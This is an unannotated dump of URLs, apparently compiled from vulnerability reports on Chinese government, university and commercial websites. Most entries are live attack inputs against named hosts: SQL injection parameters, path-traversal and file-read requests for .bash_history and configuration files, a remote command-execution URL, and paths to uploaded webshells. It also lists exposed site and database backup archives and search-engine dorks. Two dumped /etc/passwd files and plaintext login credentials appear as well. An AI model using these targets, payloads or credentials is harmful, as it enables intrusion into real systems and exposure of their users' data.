http://b.agent.fang.com/magent/Support/feedback/myopinions.aspx?txtBeginDate=&txtEndDate=&selStatus=&page=1&action=del&feedid=3626 http://esports.games.ifeng.com/lushi/getpic?t= http://esports.games.ifeng.com/lushi/getpic?t= http://mall.oppo.com http://gitlab.baozou.com http://www.rpsg.sgcc.com.cn/ http://zbzl.sgcc.com.cn/ www.rpsg.sgcc.com.cn这个看目录,明显是otcms http://www.longxinet.com/rxcq/news1/ http://www.longxinet.com/rxcq/news1/1/1.txt http://siping.jlcoop.gov.cn/newfile.txt http://www.jlcoop.gov.cn/newfile.txt http://baishan.jlcoop.gov.cn/newfile.txt http://baishan.jlcoop.gov.cn/newfile.txt http://xiaobao.xupt.edu.cn/xiaobao.rar http://pccsu.suda.edu.cn/web.rar http://international.uibe.edu.cn/international.zip http://www.dzu.edu.cn/1.zip http://career.ouc.edu.cn/1.rar http://www.niso.edu.cn/niso.zip http://lywyx.lcvtc.edu.cn/lywyx.rar http://fund.njust.edu.cn/wwwroot.rar http://open.tjrtvu.edu.cn/wwwroot.rar http://lib.xijing.edu.cn/web.zip http://qzlx.zjbc.edu.cn/qzlx.rar http://xljk.qau.edu.cn/1.zip http://career.bnu.edu.cn/upfile.rar http://jxjy.zsc.edu.cn/a.rar http://jiangfan.ujs.edu.cn/data.rar http://dili.gznc.edu.cn/web.rar http://dili.gzhnc.edu.cn/web.rar http://yzb.chd.edu.cn/sql.rar http://mba.cufe.edu.cn/root.rar http://www.fjpsc.edu.cn/fjpsc.rar http://www.jxnu.edu.cn/jxnu.zip http://opc.cqu.edu.cn/www.zip http://lib.ncu.edu.cn/a.rar http://jyb.zstu.edu.cn/jyb.rar http://tufc.shisu.edu.cn/shisu.zip http://qiaoxiang.wyu.edu.cn/qiaoxiang.rar http://www.cque.edu.cn/data.rar http://www.xjufe.edu.cn/web.rar http://mba.tju.edu.cn/a.rar http://xgw.csu.edu.cn/web.zip http://www.zjcgs.gov.cn/news_show.aspx?id=A0000000000000000001&classid=02 http://www.xckfq.gov.cn/Article-View.asp?id=570 http://www.xcfc.gov.cn/Menu_Super.asp?typeid=2 http://www.xccoop.gov.cn/lx_list.asp?lx=1&lxid=42 http://www.xcast.gov.cn/topic/red/news_list.php?ty=9&infoty=23 http://www.xatourism.gov.cn/Entertainment/entertainment_list.aspx?type=traffic&pid=220&id=222 
http://www.tzzzfdc.gov.cn/news.aspx?id=38 http://www.whfdc.gov.cn/newhouse/list.php?prjid=-12221 http://www.wlmz.gov.cn/movienews.asp?id=39 http://www.wwjs.gov.cn/list.php?lm2=136 http://www.wysxzfw.gov.cn/portal//new/index.jsp?pCateunid=20101125-5395B1E39D60CBA398BC-11&cateunid=20101125-69DAA6E5CA7C55E8E8B4-11 http://www.wzwsj.gov.cn/product_info.asp?id=26 http://2004.yangchun.gov.cn/gov/law/article.asp?art=41695 http://361.zzszq.gov.cn/articleContent.jsp?colId=204&artId=1247 http://ajj.aks.gov.cn/list.asp?lm=21 http://dwgk.yantai.gov.cn/dwztc/show.jsp?id=234236 http://rshj.yantai.gov.cn/YTIICSMDH/show.jsp?id=239007 http://smwsbsdt.xintai.gov.cn/permissionitem_list_Sort.jspx?sortcode=001001012&areaid=370982 https://passport.minshengec.com http://aixinbaoguo.chinapost.com.cn/zxjz//zxjz/detail_JGAction.do?step=1&ddbh=99880214111500000001&keyddbh=99880214111500000003, http://www.lpai.com.cn/loginController.do?login用户名:admin密码:123456 https://partner.wuhan.wandamoviepark.com/ https://partner.wuhan.wandamoviepark.com/travel/Index https://partner.wuhan.wandamoviepark.com/travel/report http://www.11183.com.cn/ec-web/jsp/addressBook/addressbook_toEditCustom.action?sid=56602这个就OK。 http://zte-e.com/cn/changework.aspx?EID=2 http://pic.sogou.com http://ngcc.cn/ http://218.244.250.94/ http://www.yoyoer.com/order/detail.php?order_id=237 http://www.yoyoer.com/order/detail.php?order_id=231 http://www.yoyoer.com/order/detail.php?order_id=232 http://www.yoyoer.com/order/detail.php?order_id=233 http://www.yoyoer.com/order/detail.php?order_id=2222 http://www.mopi.pw/tz/tz.swf http://blog.tianya.cn/post-5366057-81052146-1.shtml http://cms.766.com/admin/webgame/index.php?c=api&m=index&action=yytest&limit=1&offset=13 http://ap.189store.com/ http://ap.189store.com http://scan.qh.vnet.cn/.svn/entries http://union.tiantian.com/index.php?m=user&a=register_web_email_check&&clientid=name&name=222%40qq.com%20order%20by%204%23&_=1422267896718 URL:erp.tiantian.com http://106.2.161.16:8080 
http://sns.web.maxthon.cn/browser/my.php?_r_=http://my.maxthon.cn/?uid=1 http://jiankong.coocaa.net/ http://www.sasu.edu.cn/showjx.asp?smallclassid=28 http://www.sasu.edu.cn/showjx.asp?” --cookie “smallclassid=28” --tables http://www.glbus.net:8000/ http://183.136.203.105/help/detail.php http://cesi.cumt.edu.cn/djzx/manage/login.aspx http://www.189kan.net/Online_1.aspx?WorkId=5 http://27.223.70.49:8080/ http://115.182.17.32:8080/ http://183.136.168.148:8081/about/show.action http://rl.mcdonalds.com.cn/rl/cid.php?pid= http://www1.mcdonalds.com.cn/list/quality/index.php?DocTypeId=61 http://rl.mcdonalds.com.cn/rl/index.php?province=&city=&type2=&address=&range=&curpage=1 http://www1.mcdonalds.com.cn/list/quality/cid.php?DocTypeId= http://alumni.bjtu.edu.cn/sernewslist.aspx?key=22 alumni.bjtu.edu.cn/newsinfon8.aspx?newsid=1 alumni.bjtu.edu.cn/GnxyhInfon2.aspx?ID=1 http://big5.citic.com/trc/cei.intra.citic.com:82/Pages/Login.aspx http://cht.citic/trc/datasync.cei.gov.cn/ControlServer.asmx http://211.100.56.171:8080/ http://211.100.56.171:8080/script http://www.sharp.cn/admin/news/206/edit http://tnew.caijing.com.cn/.svn/entries这个网站的泄露问题,却写错成了http://service.caijing.com.cn/.svn/entries http://tnew.caijing.com.cn/.svn/entries tnew.caijing.com.cn/Group/glist/gid/2 tnew.caijing.com.cn/Group/glist/gid/(sql注入参数) http://58.56.128.33/login/Login.jsp?logintype=1&gopage=&message=55 http://58.56.128.33:81/message.do?redirect=1 dir:/usr/mobile/webapps/ROOT/ http://117.79.131.110:7094 http://nldp.pigai.org:7777 http://debug.pigai.org/admin/ https://ld.edugd.cn/1.txt http://wssp.hb12369.net:8070/spmh/searchmoreData.action?deptid=1 http://**.**.**/ http://**.**.**/ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh http://117.79.131.101:8983/solr/#/ http://wxftp.96520.com:8080/hsccms/ http://wxftp.96520.com:8080/hsccms/templet_pro.do http://www.wooyun.org/bugs/wooyun-2015-094120/trace/dced55236ac48daf075cbc5728c732f7 http://cn.mall-builder.com/ http://www.appstar.com.cn/ http://www.appstar.com.cn/makeapp.htm http://www.wayboo.cn/ http://www.shfuhai.com/download_list.php?class=282 http://www.xhbzdc.com/download_list.php?class=243 http://www.xingguofx.com/download_list.php?class=206 http://www.bdjyjx.com/download_list.php?class=294 http://www.jndsmm.com/download_list.php?class=197 http://www.xakqby.com/download_list.php?class=311 http://www.fangshuilaoguo.com/download_list.php?class=222 http://sjzbangongjiaju.com/download_list.php?class=171 http://chengkai888.com/download_list.php?class=262 http://www.hqdsvf.com/download_list.php?class=308 http://www.dfhlgl.com/download_list.php?class=200 http://www.lnsbhg.com/download_list.php?class=223 http://www.sxtongtu.com/download_list.php?class=250 http://www.xyxf119.com/download_list.php?class=147 http://www.zzpjjg.com/download_list.php?class=229 http://hszyzc.com/download_list.php?class=233 http://chengxinbaipisong.com/download_list.php?class=183 http://www.qiqiangjx.com/download_list.php?class=280 http://www.jljddb.com/download_list.php?class=212 http://qcsiwang.com/download_list.php?class=240 http://www.hbdxps.com/download_list.php?class=282 http://www.huashidaijiaoyu.com/download_list.php?class=207 http://www.hszs555.com/download_list.php?class=262 http://www.chengtiannuanqi.com/download_list.php?class=272 http://www.xayichi.com/download_list.php?class=221 http://www.xayichi.com/download_list.php?class=221 
http://www.chengtiannuanqi.com/download_list.php?class=272 http://demo.wdoyo.com/ http://119.75.219.41/s http://rw.baidu.com/ http://www.sysrs.gov.cn/wwwroot.rar http://www.lnnj.gov.cn/wwwroot.rar http://www.hustats.gov.cn/hustats.rar http://ha.10086.cn/mshop/phonenum/v6phonenum!changeCardByValidateCode.action http://www.appstar.com.cn/appstar/manage/queryAceAppShow.action http://www.strongsoft.net/ ldfxb.com/SystemManage/Plan/GetArea.ashx?sqlkey=Map_S_GetSubAreaByPID_PX&pid=330281006000000&_=1421664911304 yj.yywater.gov.cn/SystemManage/Plan/GetArea.ashx?sqlkey=Map_S_GetSubAreaByPID_PX&pid=330281006000000&_=1421664911304 shzh.wlfx.gov.cn/SystemManage/Plan/GetArea.ashx?sqlkey=Map_S_GetSubAreaByPID_PX&pid=330281006000000&_=1421664911304 shzh.dqwater.gov.cn/SystemManage/Plan/GetArea.ashx?sqlkey=Map_S_GetSubAreaByPID_PX&pid=330281006000000&_=1421664911304 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC 
User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin nemo:x:500:500::/home/nemo:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash mysql:x:503:503::/home/mysql:/bin/bash ucus:x:502:513::/home/ucus:/bin/bash cd_manager:x:504:513::/home/cd_manager:/bin/bash cd_mgr2:x:514:514::/home/cd_mgr2:/bin/bash ucfz:x:515:515::/home/ucfz:/bin/bash readonly:x:516:516::/home/readonly:/bin/bash mfs:x:517:517::/home/mfs:/bin/bash nemoread:x:518:518::/home/nemoread:/bin/bash hadoop:x:519:519::/home/hadoop:/bin/bash shuzy:x:520:520::/home/shuzy:/bin/bash shizy:x:521:521::/home/shizy:/bin/bash ucbase:x:522:522::/home/ucbase:/bin/bash http://58.248.56.116/zecmd/zecmd.jsp http://aic.hainan.gov.cn:5888/admin/protected/index.jsp http://www.zdlife.com/login.do http://www.zdlife.com/ckeditor/uploader/upload/images/file1422287286611.jsp http://www.zdlife.com/ckeditor/uploader/upload/file1422285750645.jsp http://adminht.17u.net/Login.aspx www.mogujie.com ip:114.113.228.211 http://articleso.enet.com.cn/admin/stats.jsp inurl:inurl:http://www.xrush.cn/client/v3/Payments.aspx?bg= http://www.xrush.cn/client/v3/Payments.aspx?bg=B9BCC3&user=414075255&passwd=ysy357159&sponsorid=6 URL:http://www.appstar.com.cn/ctStore.htm http://www.appstar.com.cn/saveApplication.htm URL:http://www.appstar.com.cn/getAppInfo_6b843926-9598-435f-ad75-874b69cd9792.htm http://www.wayboo.cn/ http://www.shfuhai.com/link.php?class=282 http://www.xhbzdc.com/link.php?class=243 http://www.xingguofx.com/link.php?class=206 http://www.bdjyjx.com/link.php?class=294 http://www.jndsmm.com/link.php?class=197 
http://www.xakqby.com/link.php?class=311 http://www.fangshuilaoguo.com/link.php?class=222 http://sjzbangongjiaju.com/link.php?class=171 http://chengkai888.com/link.php?class=262 http://www.hqdsvf.com/link.php?class=308 http://www.dfhlgl.com/link.php?class=200 http://www.lnsbhg.com/link.php?class=223 http://www.sxtongtu.com/link.php?class=250 http://www.xyxf119.com/link.php?class=147 http://www.zzpjjg.com/link.php?class=229 http://hszyzc.com/link.php?class=233 http://chengxinbaipisong.com/link.php?class=183 http://www.qiqiangjx.com/link.php?class=280 http://www.jljddb.com/link.php?class=212 http://qcsiwang.com/link.php?class=240 http://www.hbdxps.com/link.php?class=282 http://www.huashidaijiaoyu.com/link.php?class=207 http://www.hszs555.com/link.php?class=262 http://www.chengtiannuanqi.com/link.php?class=272 http://www.xayichi.com/link.php?class=221 http://www.xayichi.com/link.php?class=221 http://www.chengtiannuanqi.com/link.php?class=272 Shell:http://emec.sjtu.edu.cn/bbs/1.asp http://211.152.50.8:8081/login.aspx http://211.152.50.142:8081/login.aspx http://61.152.94.125:8081/login.aspx http://61.152.94.119:8081/login.aspx http://61.152.94.126:8081/login.aspx http://210.51.51.155:8081/login.aspx http://172.24.200.171/portal/demand/getRecommendNew.action?identify=notice http://172.24.200.171/portal/demand/getRecommendNew.action?identify=index http://10.205.22.158/appweb/login/login!checkLoginfoFromTV?keyno=xxx®ionCode=aaaa来获取用户的信息。 http://fw.517na.com/ http://th.517na.com/ http://xianjinbao.icbccs.com.cn/tb/gy/share.do inurl:ftp www.china-spacenet.com http://58.241.17.92:8004/login.asp http://54sh.csu.edu.cn:808/showAddPaper.action http://citicsf.com/myalbum.do?userId=1&albumId=3 site:taobao.com inurl:/c/list_goods.php?category_id= site:taobao.com inurl:/theme/tejia/view/view_article.php?id= site:taobao.com inurl:/theme/daogou/view/list_goods.php?category_id https://**.**.**/ http://www.appstar.com.cn//appstar/manage/queryAceAppShow.action 
www.vigocam.com也存在漏洞,但是搜索乌云发现2013年b33发布了该网站的漏洞( http://www.appstar.com.cn/musicApp.htm http://61.185.190.243/login.jsp http://61.185.190.243:8000/axis2-admin/listService http://61.185.190.243:8000/services/Cat/exec?cmd=ifconfig http://220.180.239.59/main.php地址 http://221.232.149.168/login.jsp http://118.122.112.10:9090/admin/protected/index.jsp http://118.122.112.10:8051/admin/protected/index.jsp http://118.122.112.10:6988/admin/protected/index.jsp http://hstsp.com/login.do http://infosec.sjtu.edu.cn/ http://infosec.sjtu.edu.cn/Base.asp?id=141 http://www.cmm.zju.edu.cn/ http://www.zy91.com/ http://dqkh.cmda.org.cn/ http://www.dayuw.com/jtg_list.php?act=NSFTW http://www.dayuw.com/jtg_list.php?act=NSFTW http://www.dayuw.com/jtg_list.php?act=NSFTW www.ly.com里被触发了。 http://www.ly.com/robots.txt和http://www.17u.net/robots.txt http://www.17u.net这个站点的泄露应该是间接导致WooYun-2014-87985这个注入被挖出来的。可以看到robot里有贴出来这个注入漏洞所在的动态链接。看红圈就是注入所在的动态页 http://www.rfthr.com/dyzj/News_show.asp?id=1140&tid=82 http://116.228.151.16:8090/browsepeople.action?startIndex=0 http://cn.53fs.com/manage/login.asp http://183.63.191.62:8081/bppf_inf/ http://116.228.151.188:8081/browse/ZCPT http://ganglia.dcloud.cn/ http://116.252.36.38:8001/admin/protected/index.jsp http://www.hbtyzx.org.cn/ddhz-news-wen.asp?Nclassid=11&id=5497 http://www.hbtyzx.org.cn/admin/upfile.asp http://www.hbtyzx.org.cn/admin/images/upfile/2015127225547.asp http://112.91.31.42:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/data/webservice/.bash_history http://112.91.31.74:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/.bash_history http://112.91.31.42:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/webdoc/pipi.cn/gwptest/WEB-INF/classes/dbConfig.properties http://www.qzlyj.gov.cn/leaderList.jsp?parentID=18&childID=74 http://www.qzlyj.gov.cn/download.jsp?filename=../../index.jsp http://182.148.112.202:8000/ http://m.yichemall.com/ 
http://m.yichemall.com/User/Account/SetNewPassword?select=用户手机号码&key=phone http://www.bjsjwl.com/ http://www.bjgqt.com http://www.bjqx.gov.cn http://www.bjjtyfxx.com http://www.bjscccz.com http://www.qicaishangqing.com http://ganglia.ihep.ac.cn/ http://ganglia.ihep.ac.cn/gweb http://ganglia.ihep.ac.cn/mon/ http://cuc.ihep.ac.cn/PBS/ http://cuc.ihep.ac.cn/Monitor/ http://218.28.234.10/ http://ly.db.17173.com/quests.php?l2=1-90&m2=0&c2=1&r2=0&x=41&y=11 http://www.dionly.com/jiamengdian/agent.aspx?id=1 http://ht.dionly.com/Join/login.asp http://www.appstar.com.cn/musicCenter.htm http://gq.517na.com/BuyerChangeManage/ChangeManage?queryType=3&pnrCode=&orderId=&beginTime=2015-01-21&hidBeginTime=2015-01-21&endTime=2015-01-28&hidEndTime=2015-01-28&buyerId=听闻都改成了参数化查询,但是某个欺骗的逻辑设计导致全部改签机票订单暴露。。。 http://gq.517na.com/BuyerChangeManage/ChangeManage?queryType=-1&pnrCode=&orderId=&beginTime=2014-01-01&hidBeginTime=2014-01-01&endTime=2015-01-28&hidEndTime=2015-01-28&buyerId= http://www.appstar.com.cn/appstar/web/user_AceApp.jsp http://60.166.52.107:8080/ https://qfpay.com/signin http://218.205.67.155/ http://mail.gzccad.gov.cn/ http://www.appstar.com.cn/mall.htm http://www.appstar.com.cn/addOrder.action coding:utf_8 http://www.appstar.com.cn/appstar/web/UploadMyapp.action http://estore.wacom.com.cn http://demo.yuncart.com/index.php并注册一个账号登陆 http://www.yuncart.com/ http://demo.yuncart.com/index.php并注册一个账号登陆 http://111.205.144.130:7001/ http://222.177.4.98/session/new http://117.21.244.175/session/new http://113.132.128.83/session/new http://218.24.46.161:8002/session/new http://218.24.46.161:8003/session/new http://218.24.46.161:8004/session/new https://218.24.46.161/session/new http://219.141.148.56/session/new http://123.173.124.5/session/new http://222.221.17.12/session/new http://124.232.136.140:8001/session/new http://117.21.244.173:8002/session/new http://117.21.244.173:8003/session/new http://113.132.128.83:8003/session/new http://219.149.135.220:8003/session/new 
http://124.232.136.140:8002/session/new http://117.21.244.175/session/new http://123.173.124.5/session/new http://221.5.242.47/session/new http://219.141.148.56/session/new http://210.76.69.93:8008/netrep/index.jsp http://www.shanghaitour.net/goal/sceList.jsp http://124.193.109.67/ https://vpn.sysucc.org.cn/ http://192.168.108.3/ http://manage.events.qq.com/ http://www.gic.net.cn/ www.wooyun.org/bugs/wooyun-2010-093459 http://m.fangdd.com/house/loupan/house-detail?house_id=21 http://202.101.244.103/web/VOD/list.asp?id=492 http://cha.17173.com/dota2/ajax/Index.html http://franchising.mcdonalds.com.cn/1.rar http://franchising.mcdonalds.com.cn/cn/1.rar http://gitlab.baozou.com/explore/projects/starred http://www.dzldjy.com/Files/help/system/help.asp http://developer.playcrab.com/public/projects http://jxw.akss.gov.cn/admin/index.asp http://www.sxztbw.cn:20046/newsDetail.jsp?id=10 http://119.97.194.18:4503/Default.aspx http://www.5925car.com/WZsearch/WZManage http://gbe.jinri.cn/ http://gbe.jinri.cn:8090/这个端口存在iisput漏洞 http://appscan.360.cn/这个站使用django开发 http://appscan.360.cn/xxx/ http://appscan.360.cn/icon/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/ http://www.qhcqjy.com.cn/info.do?para=viewconte http://mail.lnzx.gov.cn/ www.tenddata.com跳转至www.talkingdata.com http://202.203.16.101/tw/type.asp?typeid=49 http://dianping.chexun.com/bj/coupon_search?button=a&c=&SortDownload=&SortEndTime= http://www.chexun.com/topic/reviews/detailTopic.auto?infoId=2559923&type= http://www.stxyls.com/ http://www.stxyls.com/ywshow.aspx?id=98 http://www.bc.jl.gov.cn/channel.aspx?id=27 http://www.rgrcb.com/news01_1.php?class_id=186&ArticleID=10275 http://www.fh21.com.cn http://news.swupl.edu.cn:8081/Show.aspx?paperName=%CE%F7%C4%CF%D5%FE%B7%A8%B4%F3%D1%A7%B1%A8&qnum=806%20 http://218.207.233.75:81 http://www.dragonsoftit.com/zh_cn/DTShome.php#touchour http://www.dragonsoftit.com http://cn.dolphin.com http://wutongyu.info/uxss.html 
http://www.fawcar.com.cn/careers/zpInfo.jsp?id=(参数遍历) http://www.fawcar.com.cn/careers/zpInfo.jsp?id=1111 http://www.fawcar.com.cn/careers/zpInfo.jsp?id=1112 http://www.fawcar.com.cn/careers/zpInfo.jsp?id=1113 http://59.108.65.205:81/ http://score.rgrcb.com/ http://180.166.69.180/public http://www.tzb.whu.edu.cn/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F1.asp http://blogmanage.ci123.com/地址 http://wiki.ciwong.com/admin/Home/ http://career.fesco.com.cn/admin http://114.80.69.235:8888/ http://dywomen.dongying.gov.cn/manage/login.aspx?urls=http://dywomen.dongying.gov.cn/manage/index.aspx http://dywomen.dongying.gov.cn/templets/content/sapx.aspx http://m.damai.cn/ http://m.damai.cn/proj.aspx?id=76384 http://x.co/***** http://www.jinri.cn/index.html http://www.ymt360.com/forget http://www.ychl.org/ http://www.ychl.org/product_cat.asp?catid=63&catname=%BE%AB%B2%CA%B0%B8%C0%FD http://www.gyh.com.cn/product_cat.asp?catid=67&catname=%B7%C0%B8%AF%C4%BE%BB%A4%C0%B8 http://www.gyh.com.cn/product_cat.asp?catid=67&catname http://sqlmap.org http://m.xms.be.xiaomi.com/q/id/100561 http://116.114.83.164/Frame/MainIndex https://58.248.49.138/ https://ipcrs.pbccrc.org.cn/mobiletelModify.do?num=0.09377672639675438&method=getAcvitaveCode&newMobileTel=xxxxxxxxxxx&counttime=119 http://202.112.82.24:8023/web/template/web-articleInfo.action?bookArtId=16539 http://bjfslx.fesco.com.cn/samsung.payroll/ http://ams.wmw.cn/Amscontrol/Classclientmanage/showClassClient/classCode/10601/schoolid//gradeid//uid//stop_flag/0%27# http://hd.jstv.com/sdwd/admin/peoplemanager.aspx http://bbs.hh010.com/ http://www.laoganma.com.cn http://oa.bestar.com.cn/oa/Login.aspx http://xxgk.zjds.gov.cn/jcms/jcms_files/jcms1/web1/site/module/oss/downfile.jsp?filename=a.txt&pathfile=media/-1/....//....//module/oss/downfile.jsp http://www.jfcx.cn/index.shtml 
http://webcache.googleusercontent.com/search?q=cache:SFwiWG2jsYsJ:loadcontrol.ceair.com/UploadFile/20120719030257.xls+8008208820&cd=22&hl=en&ct=clnk http://loadcontrol.ceair.com/robots.txt),但搜索引擎任然收录了大量该站的文件。 http://cai.weibo.cn/h5v3.php/api/match/lists?fromchannel=h5&page=1&size=10&_=1756522&albumid=1 http://122.194.14.173:8060/ http://www.fescovip.com/benefit/regaddredit.aspx?addr=129045 http://www.fescovip.com/benefit/regaddredit.aspx?addr=129046 http://mingxiao.lwvc.edu.cn/mingxiao.rar http://www.cymy.edu.cn/web.rar http://news.zjtu.edu.cn/news.zjtu.edu.cn.rar http://www.swfu.edu.cn/website.rar http://som.xjtu.edu.cn/123.zip http://job.scuec.edu.cn/web.rar http://shc.cufe.edu.cn/bbs.zip http://icsp.ahu.edu.cn/icsp.rar http://fund.tongji.edu.cn/fund.rar http://cyc.lzjtu.edu.cn/cyc.rar http://news.qdu.edu.cn/news.sql http://www.mba.ecnu.edu.cn/mba.rar http://tyb.lcvtc.edu.cn/123.rar http://kjxy.dufe.edu.cn/kjxy.zip http://zt.gdufe.edu.cn/wwwroot.zip http://eng.suda.edu.cn/web.rar http://news.wipe.edu.cn/web.zip http://hj.hsit.edu.cn/web.rar http://jxjy.lcvtc.edu.cn/11.rar http://library.hainu.edu.cn/1.rar http://www.sme.sdnu.edu.cn/wz.rar http://www.dlu.edu.cn/wwwroot.zip http://www.qsxw.gov.cn/www.qsxw.gov.cn.rar http://www.xzcz.gov.cn/wwwroot.rar http://www.hyzhq.gov.cn/hyzhq.rar http://www.lnwater.gov.cn/lnwater.rar http://www.wjjjy.gov.cn/wjjjy.rar http://www.aydj.gov.cn/admin.rar http://bjcczx.gov.cn/www.rar http://lib.dda.gov.cn/lib.rar http://lib.dda.gov.cn/admin.rar http://sfb.kaiping.gov.cn/sfb.rar http://www.zjksb.gov.cn/zjksb.rar http://www.tzinfo.gov.cn/tzinfo.sql http://www.zjkwq.gov.cn/zjkwq.rar http://www.ahtxq.gov.cn/1.rar http://pic.dl.gov.cn/1.zip http://www.uyc.gov.cn/1.rar http://www.lzsjxw.gov.cn/wwwroot.rar http://wnd.dg.gov.cn/wnd.rar http://wnd.dg.gov.cn/1.rar http://www.lbny.gov.cn/www.rar http://www.hbsz.gov.cn/a.rar http://www.rzhb.gov.cn/rzhb.rar http://www.wcb.yn.gov.cn/1.rar http://www.qzgaj.gov.cn/1.rar http://www.jmdbq.gov.cn/1.rar 
http://www.zjkyx.gov.cn/zjkyx.rar http://www.f5.bjyq.gov.cn/admin.rar http://apeco.gov.cn/bak.rar http://www.bsgajj.gov.cn/123.zip http://www.glgs.gov.cn/1.rar http://www.phagri.gov.cn/1.rar http://gd.xiangtan.gov.cn/123.rar http://www.jxcy.gov.cn/www.jxcy.gov.cn.zip http://oa.bzqts.gov.cn/oa.rar http://www.hic.gov.cn/web.zip http://xjhbk.gov.cn/1.rar http://www.aqdgxc.gov.cn/www.zip http://www.aqdgxc.gov.cn http://www.xjhbk.gov.cn/1.rar http://www.cclgbj.gov.cn/cclgbj.rar http://mlr.gov.cn/mlr.zip http://www.syxnc.gov.cn/www.rar http://gx.bjpop.gov.cn/gx.rar http://www.dpac.gov.cn/www.zip http://www.hstzb.gov.cn/hstzb.rar http://ahtxq.gov.cn/1.rar http://fzb.xiangtan.gov.cn/123.rar http://wx.hhga.gov.cn/wx.tar.gz http://www.baodijiwei.gov.cn/www.rar http://www.czxfw.gov.cn/web.zip http://www.czxfw.gov.cn/web.rar http://www.zltrsj.gov.cn/wwwroot.rar http://xyxh.hldcredit.gov.cn/xyxh.rar http://www.zppolice.gov.cn/www.zppolice.gov.cn.rar http://www.lyxjjw.gov.cn/1.zip http://tourism.longhui.gov.cn/www.rar http://www.cqszta.gov.cn/wwwroot.rar http://www.ahjh.gov.cn/bak.rar http://cg.lhk.gov.cn/cg.rar http://www.zgqingyang.gov.cn/123.rar http://www.sn119.gov.cn/website.rar www.sn119.gov.cn http://www.xtsl.gov.cn/123.rar http://www.hnydsh.gov.cn/web.rar http://www.fqagri.gov.cn/fqagri.gov.cn.zip http://www.hnydsh.gov.cn/data.rar http://www.xyxrmjcy.gov.cn/web.rar http://www.kxzf.gov.cn/web.rar http://www.kxzf.gov.cn/1.rar http://www.zda.gov.cn/a.rar http://gzcx.jscd.gov.cn/1.rar http://www.dzjw.gov.cn/1.rar http://www.doumen.gov.cn/a.rar http://www.taihaoling.gov.cn/taihaoling.rar http://www.tzhymz.gov.cn/123.rar http://zwdt.sd.gov.cn/admin.rar http://en.cnci.gov.cn/web.rar http://en.cnci.gov.cn/data.rar http://shqapp.mca.gov.cn/web.rar http://www.hbnjh.gov.cn/wwwroot.rar http://www.qdeic.gov.cn/data.rar http://www.haikoutour.gov.cn/haikoutour.gov.cn.rar http://www.haikoutour.gov.cn/haikoutour.rar http://www.hfjjzd.gov.cn/1.rar http://mail2012.foshan.gov.cn/data.rar 
